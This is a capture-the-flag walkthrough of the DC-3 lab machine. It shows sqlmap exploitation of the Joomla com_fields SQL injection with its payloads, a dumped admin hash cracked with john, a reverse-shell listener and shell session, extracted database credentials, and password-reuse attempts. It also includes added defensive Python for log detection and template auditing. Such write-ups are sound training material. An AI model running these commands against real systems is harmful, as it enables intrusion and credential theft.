DC-3 Target Machine


Information Gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.125
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-10 10:26 EDT
Nmap scan report for 192.168.56.125
Host is up (0.00074s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:CC:D5:DF (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 9.30 seconds

Only one TCP port, 80, is open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80 192.168.56.125
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-10 10:27 EDT
Nmap scan report for 192.168.56.125
Host is up (0.00057s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:CC:D5:DF (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.27 seconds

The site runs Joomla on Ubuntu. As I recall, Joomla has had plenty of vulnerabilities; let's also take a look at a UDP scan.

┌──(kali㉿kali)-[~/Downloads/dc_3/rsa/2048]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.125
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-10 22:39 EDT
Nmap scan report for 192.168.56.125
Host is up (0.00061s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 08:00:27:CC:D5:DF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 24.92 seconds

Indeed only this port is open; let's run nmap's vulnerability scripts against it.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p80 192.168.56.125
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-10 10:28 EDT
Nmap scan report for 192.168.56.125
Host is up (0.00069s latency).

PORT STATE SERVICE
80/tcp open http
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2017-8917:
| VULNERABLE:
| Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2017-8917
| Risk factor: High CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
| An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
| to execute aribitrary SQL commands via unspecified vectors.
|
| Disclosure date: 2017-05-17
| Extra information:
| User: root@localhost
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
|_ https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.125
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.125:80/
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.56.125:80/index.php
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.56.125:80/index.php/component/users/?view=reset&Itemid=101
| Form id: user-registration
| Form action: /index.php/component/users/?task=reset.request&Itemid=101
|
| Path: http://192.168.56.125:80/index.php/component/users/?view=reset&Itemid=101
| Form id: login-form
| Form action: /index.php/component/users/?Itemid=101
|
| Path: http://192.168.56.125:80/index.php/2-uncategorised/1-welcome
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.56.125:80/index.php/component/users/?view=remind&Itemid=101
| Form id: user-registration
| Form action: /index.php/component/users/?task=remind.remind&Itemid=101
|
| Path: http://192.168.56.125:80/index.php/component/users/?view=remind&Itemid=101
| Form id: login-form
| Form action: /index.php/component/users/?Itemid=101
|
| Path: http://192.168.56.125:80/index.php/component/users/
| Form id: username-lbl
| Form action: /index.php/component/users/?task=user.login&Itemid=101
|
| Path: http://192.168.56.125:80/index.php/component/users/
| Form id: login-form
|_ Form action: /index.php/component/users/?Itemid=101
| http-enum:
| /administrator/: Possible admin folder
| /administrator/index.php: Possible admin folder
| /administrator/manifests/files/joomla.xml: Joomla version 3.7.0
| /language/en-GB/en-GB.xml: Joomla version 3.7.0
| /htaccess.txt: Joomla!
| /README.txt: Interesting, a readme.
| /bin/: Potentially interesting folder
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /includes/: Potentially interesting folder
| /libraries/: Potentially interesting folder
| /modules/: Potentially interesting folder
| /templates/: Potentially interesting folder
|_ /tmp/: Potentially interesting folder
MAC Address: 08:00:27:CC:D5:DF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 327.57 seconds

Directory Brute-Forcing

The scan mentions CVE-2017-8917 and also lists many directories and files, so let's brute-force directories while we're at it.

┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.168.56.125
[sudo] password for kali:
Sorry, try again.
[sudo] password for kali:

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.125/_23-07-10_10-50-31.txt

Error Log: /root/.dirsearch/logs/errors-23-07-10_10-50-31.log

Target: http://192.168.56.125/

[10:50:31] Starting:
[10:50:32] 403 - 300B - /.ht_wsr.txt
[10:50:32] 403 - 303B - /.htaccess.bak1
[10:50:32] 403 - 305B - /.htaccess.sample
[10:50:32] 403 - 303B - /.htaccess.orig
[10:50:32] 403 - 301B - /.htaccess_sc
[10:50:32] 403 - 303B - /.htaccess.save
[10:50:32] 403 - 301B - /.htaccessBAK
[10:50:32] 403 - 303B - /.htaccess_orig
[10:50:32] 403 - 304B - /.htaccess_extra
[10:50:32] 403 - 302B - /.htaccessOLD2
[10:50:32] 403 - 301B - /.htaccessOLD
[10:50:32] 403 - 293B - /.htm
[10:50:32] 403 - 294B - /.html
[10:50:32] 403 - 300B - /.httr-oauth
[10:50:32] 403 - 299B - /.htpasswds
[10:50:32] 403 - 303B - /.htpasswd_test
[10:50:33] 403 - 293B - /.php
[10:50:33] 403 - 294B - /.php3
[10:50:36] 200 - 18KB - /LICENSE.txt
[10:50:36] 200 - 4KB - /README.txt
[10:50:42] 301 - 324B - /administrator -> http://192.168.56.125/administrator/
[10:50:42] 403 - 312B - /administrator/.htaccess
[10:50:42] 200 - 5KB - /administrator/
[10:50:42] 200 - 31B - /administrator/cache/
[10:50:42] 200 - 2KB - /administrator/includes/
[10:50:42] 200 - 5KB - /administrator/index.php
[10:50:42] 200 - 31B - /administrator/logs/
[10:50:42] 301 - 329B - /administrator/logs -> http://192.168.56.125/administrator/logs/
[10:50:45] 301 - 314B - /bin -> http://192.168.56.125/bin/
[10:50:45] 200 - 31B - /bin/
[10:50:45] 301 - 316B - /cache -> http://192.168.56.125/cache/
[10:50:45] 200 - 31B - /cache/
[10:50:46] 200 - 31B - /cli/
[10:50:46] 301 - 321B - /components -> http://192.168.56.125/components/
[10:50:46] 200 - 31B - /components/
[10:50:47] 200 - 0B - /configuration.php
[10:50:52] 200 - 3KB - /htaccess.txt
[10:50:52] 301 - 317B - /images -> http://192.168.56.125/images/
[10:50:52] 200 - 31B - /images/
[10:50:52] 301 - 319B - /includes -> http://192.168.56.125/includes/
[10:50:52] 200 - 31B - /includes/
[10:50:53] 200 - 7KB - /index.php
[10:50:54] 301 - 319B - /language -> http://192.168.56.125/language/
[10:50:54] 200 - 31B - /layouts/
[10:50:54] 301 - 320B - /libraries -> http://192.168.56.125/libraries/
[10:50:54] 200 - 31B - /libraries/
[10:50:55] 301 - 316B - /media -> http://192.168.56.125/media/
[10:50:56] 200 - 31B - /media/
[10:50:56] 301 - 318B - /modules -> http://192.168.56.125/modules/
[10:50:56] 200 - 31B - /modules/
[10:51:00] 301 - 318B - /plugins -> http://192.168.56.125/plugins/
[10:51:00] 200 - 31B - /plugins/
[10:51:02] 200 - 836B - /robots.txt.dist
[10:51:02] 403 - 303B - /server-status/
[10:51:02] 403 - 302B - /server-status
[10:51:05] 200 - 31B - /templates/
[10:51:05] 200 - 0B - /templates/protostar/
[10:51:05] 200 - 0B - /templates/beez3/
[10:51:05] 200 - 31B - /templates/index.html
[10:51:05] 301 - 320B - /templates -> http://192.168.56.125/templates/
[10:51:05] 200 - 0B - /templates/system/
[10:51:06] 301 - 314B - /tmp -> http://192.168.56.125/tmp/
[10:51:06] 200 - 31B - /tmp/
[10:51:08] 200 - 2KB - /web.config.txt

Joomla SQL Injection

Searching Exploit-DB turned up the corresponding exploit script, which explains how to perform the injection with SQLMap.

Let's try following the commands given there.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.56.125/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.56.125/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -p list[fullordering] --tables

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.56.125/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -p list[fullordering] -T '#__users' --columns
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.56.125/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -p list[fullordering] -T '#__users' --dump
___
__H__
___ ___["]_____ ___ ___ {1.7.6#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:10:50 /2023-07-10/

[11:10:50] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[11:10:50] [INFO] resuming back-end DBMS 'mysql'
[11:10:50] [INFO] testing connection to the target URL
[11:10:51] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=k6o2ipqeqht...g5bmibevh0'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(7808,CONCAT(0x2e,0x7162786b71,(SELECT (ELT(7808=7808,1))),0x716b766b71),3038))

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 3897 FROM (SELECT(SLEEP(5)))wOhr)
---
[11:10:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[11:10:52] [INFO] fetching columns for table '#__users' in database 'joomladb'
[11:10:52] [WARNING] unable to retrieve column names for table '#__users' in database 'joomladb'
do you want to use common column existence check? [y/N/q] y
[11:10:53] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
which common columns (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-columns.txt' (press Enter)
[2] custom
>
[11:10:54] [INFO] checking column existence using items from '/usr/share/sqlmap/data/txt/common-columns.txt'
[11:10:54] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)]
[11:10:56] [WARNING] running in a single-thread mode. This could take a while
[11:10:56] [INFO] retrieved: id
[11:10:56] [INFO] retrieved: name
[11:10:56] [INFO] retrieved: username
[11:10:57] [INFO] retrieved: email
[11:11:00] [INFO] retrieved: password
[11:11:44] [INFO] retrieved: params

[11:11:56] [INFO] fetching entries for table '#__users' in database 'joomladb'
[11:11:56] [INFO] retrieved: 'admin'
[11:11:56] [INFO] retrieved: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
[11:11:56] [INFO] retrieved: 'freddy@norealaddress.net'
[11:11:56] [INFO] retrieved: '629'
[11:11:56] [INFO] retrieved: '{"admin_style":"","admin_language":"","language":"","editor":"","helpsite":"","time...
[11:11:56] [INFO] retrieved: 'admin'
Database: joomladb
Table: #__users
[1 entry]
+-----+--------------------------+--------+----------------------------------------------------------------------------------------------+----------+--------------------------------------------------------------+
| id | email | name | params | username | password |
+-----+--------------------------+--------+----------------------------------------------------------------------------------------------+----------+--------------------------------------------------------------+
| 629 | freddy@norealaddress.net | admin | {"admin_style":"","admin_language":"","language":"","editor":"","helpsite":"","timezone":""} | admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+-----+--------------------------+--------+----------------------------------------------------------------------------------------------+----------+--------------------------------------------------------------+

[11:11:56] [INFO] table 'joomladb.`#__users`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.125/dump/joomladb/#__users.csv'
[11:11:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2683 times
[11:11:56] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.125'

[*] ending @ 11:11:56 /2023-07-10/
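From the defender's side, the requests sqlmap sent above leave a distinctive trace in the web server's access log. The following Python is an added example, not part of the original post: it parses constructed Apache combined-format log lines and flags com_fields requests whose list[fullordering] value carries SQL, and separately lists clients producing bursts of HTTP 500s (the run above caused 2683 of them).

```python
"""Spot Joomla com_fields (CVE-2017-8917) injection attempts in an Apache
access log.  Added example, not from the original post; the log lines are
constructed to mirror the sqlmap payloads shown above."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache combined log format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# SQL fragments seen in the error-based and time-based payloads above
SQL_MARKERS = ("updatexml", "extractvalue", "sleep(", "select", "concat(")

# Constructed sample: two sqlmap probes, one legitimate ordering, one unrelated page
SAMPLE_LOG = """\
192.168.56.106 - - [10/Jul/2023:11:10:51 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=%28UPDATEXML%287808%2CCONCAT%280x2e%2C0x7162786b71%2C%28SELECT+%28ELT%287808%3D7808%2C1%29%29%29%2C0x716b766b71%29%2C3038%29%29 HTTP/1.1" 500 1342 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/419"
192.168.56.106 - - [10/Jul/2023:11:10:52 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=%28SELECT+3897+FROM+%28SELECT%28SLEEP%285%29%29%29wOhr%29 HTTP/1.1" 500 1342 "-" "Mozilla/5.0"
192.168.56.50 - - [10/Jul/2023:11:12:00 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.title+ASC HTTP/1.1" 200 7040 "-" "Mozilla/5.0"
192.168.56.50 - - [10/Jul/2023:11:12:05 -0400] "GET /index.php/2-uncategorised/1-welcome HTTP/1.1" 200 7200 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if unparseable."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_com_fields_sqli(target):
    """True for a com_fields request whose list[fullordering] carries SQL;
    a legitimate value is a column plus direction such as 'a.title ASC'."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if qs.get("option", [""])[0] != "com_fields":
        return False
    return any(
        marker in value.lower()
        for value in qs.get("list[fullordering]", [])
        for marker in SQL_MARKERS
    )


def find_sqli_attempts(log_text):
    """(ip, timestamp, status) for every request matching the injection shape."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_com_fields_sqli(rec["target"]):
            hits.append((rec["ip"], rec["ts"], int(rec["status"])))
    return hits


def error_burst_sources(log_text, threshold):
    """Clients with at least `threshold` HTTP 500 responses; the sqlmap run
    above triggered 2683 of them, a signal even without payload matching."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == "500":
            counts[rec["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}
```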

Cracking with john

With the user's password hash in hand, online lookups found nothing, so john it is. Along the way I noticed that I keep forgetting the trailing = in --wordlist=. hash-identifier failed to recognise the hash type; an online tool identified it as bcrypt, but that type did not seem to appear in the --format list. A web search confirmed that --format=bcrypt does work.

┌──(kali㉿kali)-[~/Downloads/dc_3]
└─$ cat passwd
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

┌──(kali㉿kali)-[~/Downloads/dc_3]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt passwd --format=bcrypt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy (?)
1g 0:00:00:00 DONE (2023-07-10 11:33) 1.086g/s 156.5p/s 156.5c/s 156.5C/s mylove..sandra
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
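The $2y$10$ prefix that hash-identifier missed is the bcrypt modular-crypt format, and the cost of 10 is why john reports an iteration count of 1024. This added Python example (not from the original post) parses the hash dumped above and estimates how long john's measured 156.5 c/s would need to exhaust a wordlist; the rockyou entry count used is an assumed round figure.

```python
"""Parse a bcrypt modular-crypt hash and estimate wordlist cracking time.
Added example, not from the original post.  The hash is the one sqlmap dumped
from #__users above; the wordlist size is an assumed approximate figure."""
import re

# $<variant>$<cost>$<22-char salt><31-char digest>, in bcrypt's own base64 alphabet
BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)

DUMPED_HASH = "$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu"

ROCKYOU_SIZE = 14_344_000   # assumed approximate number of entries in rockyou.txt
JOHN_RATE = 156.5           # candidates per second john reported above


def parse_bcrypt(hash_str):
    """Split a bcrypt string into its parts.  The work factor is 2**cost
    rounds, which is the 'Cost 1 (iteration count)' that john prints."""
    m = BCRYPT_RE.match(hash_str)
    if m is None:
        raise ValueError("not a bcrypt modular-crypt string")
    cost = int(m["cost"])
    return {
        "variant": m["variant"],   # 2y is the variant PHP (and thus Joomla) emits
        "cost": cost,
        "iterations": 2 ** cost,
        "salt": m["salt"],
        "digest": m["digest"],
    }


def hours_to_exhaust(wordlist_size, cracks_per_second):
    """Worst-case time to try a whole wordlist against one hash at a given rate."""
    return wordlist_size / cracks_per_second / 3600
```

The crack above finished in under a second only because snoopy sits near the start of rockyou; at this rate the full list would take roughly a day per hash, so rejecting wordlist passwords at registration matters more than the cost factor.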

Reverse Shell from the Joomla Admin Panel

Log in to the admin panel with this password, then edit a template file and write the reverse-shell code into it.

Note that the file is reached at http://192.168.56.125/templates/beez3/8888.php; the directory brute-force results help confirm the path.

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.125] 53722
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@DC-3:/var/www/html/templates/beez3$ whoami
whoami
www-data
www-data@DC-3:/var/www/html/templates/beez3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@DC-3:/var/www/html/templates/beez3$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:cc:d5:df brd ff:ff:ff:ff:ff:ff
inet 192.168.56.125/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fecc:d5df/64 scope link
valid_lft forever preferred_lft forever
www-data@DC-3:/var/www/html/templates/beez3$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
www-data@DC-3:/var/www/html/templates/beez3$ python -c "import pty;pty.spawn('/bin/bash')"
</templates/beez3$ python -c "import pty;pty.spawn('/bin/bash')"
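The persistence step above works because nothing checks what lives in a template directory. This added Python example (not from the original post) builds a constructed beez3-like tree in a temporary directory and lists PHP files that the template's templateDetails.xml manifest does not declare; the manifest contents are assumed, and 8888.php stands in for the file dropped on this box.

```python
"""List PHP files in a Joomla template directory that its templateDetails.xml
manifest does not declare.  Added example, not from the original post; the
template tree is constructed in a temporary directory and the manifest is
assumed, with 8888.php standing in for the file dropped into beez3 above."""
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed manifest in the shape Joomla templates ship with
DEMO_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<extension version="3.1" type="template" client="site">
  <name>beez3</name>
  <files>
    <filename>index.php</filename>
    <filename>error.php</filename>
    <filename>templateDetails.xml</filename>
    <folder>html</folder>
    <folder>css</folder>
  </files>
</extension>
"""


def declared_paths(manifest_path):
    """(filenames, folders) that the manifest's <files> section declares."""
    root = ET.parse(manifest_path).getroot()
    files = {n.text.strip() for n in root.iter("filename") if n.text}
    folders = {n.text.strip().strip("/") for n in root.iter("folder") if n.text}
    return files, folders


def undeclared_php_files(template_dir):
    """Relative paths of .php files that are neither a declared <filename>
    nor inside a declared <folder>.  Anything returned is worth a look."""
    manifest = os.path.join(template_dir, "templateDetails.xml")
    files, folders = declared_paths(manifest)
    rogue = []
    for dirpath, _, names in os.walk(template_dir):
        for name in names:
            if not name.lower().endswith(".php"):
                continue
            rel = os.path.relpath(os.path.join(dirpath, name), template_dir)
            rel = rel.replace(os.sep, "/")
            if rel in files or any(rel.startswith(f + "/") for f in folders):
                continue
            rogue.append(rel)
    return sorted(rogue)


def build_demo_template(include_rogue=True):
    """Create the constructed beez3-like tree and return its path."""
    base = tempfile.mkdtemp(prefix="beez3_")
    os.makedirs(os.path.join(base, "html", "com_content"))
    with open(os.path.join(base, "templateDetails.xml"), "w") as fh:
        fh.write(DEMO_MANIFEST)
    legit = ["index.php", "error.php", "html/com_content/default.php"]
    for rel in legit + (["8888.php"] if include_rogue else []):
        with open(os.path.join(base, rel), "w") as fh:
            fh.write("<?php // constructed placeholder\n")
    return base
```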

Privilege Escalation

The reverse shell worked; now gather information from files, especially the database password in the configuration file.

www-data@DC-3:/var/www/html$ cat configuration.php
cat configuration.php
<?php
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'DC-3';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'squires';
public $db = 'joomladb';
public $dbprefix = 'd8uea_';
public $live_site = '';
public $secret = '7M6S1HqGMvt1JYkY';
public $gzip = '0';
public $error_reporting = 'default';
public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
public $ftp_host = '127.0.0.1';
public $ftp_port = '21';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
public $ftp_enable = '0';
public $offset = 'UTC';
public $mailonline = '1';
public $mailer = 'mail';
public $mailfrom = 'freddy@norealaddress.net';
public $fromname = 'DC-3';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = '0';
public $smtpuser = '';
public $smtppass = '';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = '25';
public $caching = '0';
public $cache_handler = 'file';
public $cachetime = '15';
public $cache_platformprefix = '0';
public $MetaDesc = 'A website for DC-3';
public $MetaKeys = '';
public $MetaTitle = '1';
public $MetaAuthor = '1';
public $MetaVersion = '0';
public $robots = '';
public $sef = '1';
public $sef_rewrite = '0';
public $sef_suffix = '0';
public $unicodeslugs = '0';
public $feed_limit = '10';
public $feed_email = 'none';
public $log_path = '/var/www/html/administrator/logs';
public $tmp_path = '/var/www/html/tmp';
public $lifetime = '15';
public $session_handler = 'database';
public $shared_session = '0';
}

Password Reuse

That gives us the database password, squires. At this point we have collected two passwords, the Joomla admin password and the database password, so a simple password-reuse attempt is worth trying, but all my attempts failed.

www-data@DC-3:/tmp$ su -
su -
Password: 7M6S1HqGMvt1JYkY

su: Authentication failure
www-data@DC-3:/tmp$ su -
su -
Password: squires

su: Authentication failure
www-data@DC-3:/tmp$ su -
su -
Password: snoopy

su: Authentication failure
www-data@DC-3:/tmp$ su dc3
su dc3
Password: snoopy

su: Authentication failure
www-data@DC-3:/tmp$ su dc3
su dc3
Password: squires

su: Authentication failure
www-data@DC-3:/tmp$ su dc3
su dc3
Password: 7M6S1HqGMvt1JYkY

su: Authentication failure

Looking inside the database turned up nothing new either; sqlmap had already pulled the key information.

Checking Scheduled Tasks

www-data@DC-3:/home$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Checking SUID Files

www-data@DC-3:/home$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
91 44 -rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
3560 156 -rwsr-xr-x 1 root root 157424 Mar 15 2019 /bin/ntfs-3g
125 28 -rwsr-xr-x 1 root root 26492 Apr 14 2016 /bin/umount
59924 40 -rwsr-xr-x 1 root root 38900 May 17 2017 /bin/su
2220 32 -rwsr-xr-x 1 root root 30112 Jul 12 2016 /bin/fusermount
76 36 -rwsr-xr-x 1 root root 34812 Apr 14 2016 /bin/mount
90 40 -rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
139240 104 -rwsr-sr-x 1 root root 105004 Mar 19 2019 /usr/lib/snapd/snap-confine
142376 16 -rwsr-xr-x 1 root root 13960 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
8400 40 -rwsr-xr-x 1 root root 38300 Mar 8 2017 /usr/lib/i386-linux-gnu/lxc/lxc-user-nic
139221 504 -rwsr-xr-x 1 root root 513528 Mar 5 2019 /usr/lib/openssh/ssh-keysign
138602 48 -rwsr-xr-- 1 root messagebus 46436 Oct 12 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
9572 8 -rwsr-xr-x 1 root root 5480 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
35876 52 -rwsr-xr-x 1 root root 53128 May 17 2017 /usr/bin/passwd
8592 36 -rwsr-xr-x 1 root root 36288 May 17 2017 /usr/bin/newgidmap
35873 80 -rwsr-xr-x 1 root root 78012 May 17 2017 /usr/bin/gpasswd
9659 160 -rwsr-xr-x 1 root root 159852 May 29 2017 /usr/bin/sudo
12604 20 -rwsr-xr-x 1 root root 18216 Jan 15 2019 /usr/bin/pkexec
35872 40 -rwsr-xr-x 1 root root 39560 May 17 2017 /usr/bin/chsh
35874 48 -rwsr-xr-x 1 root root 48264 May 17 2017 /usr/bin/chfn
8591 36 -rwsr-xr-x 1 root root 36288 May 17 2017 /usr/bin/newuidmap
59923 36 -rwsr-xr-x 1 root root 34680 May 17 2017 /usr/bin/newgrp
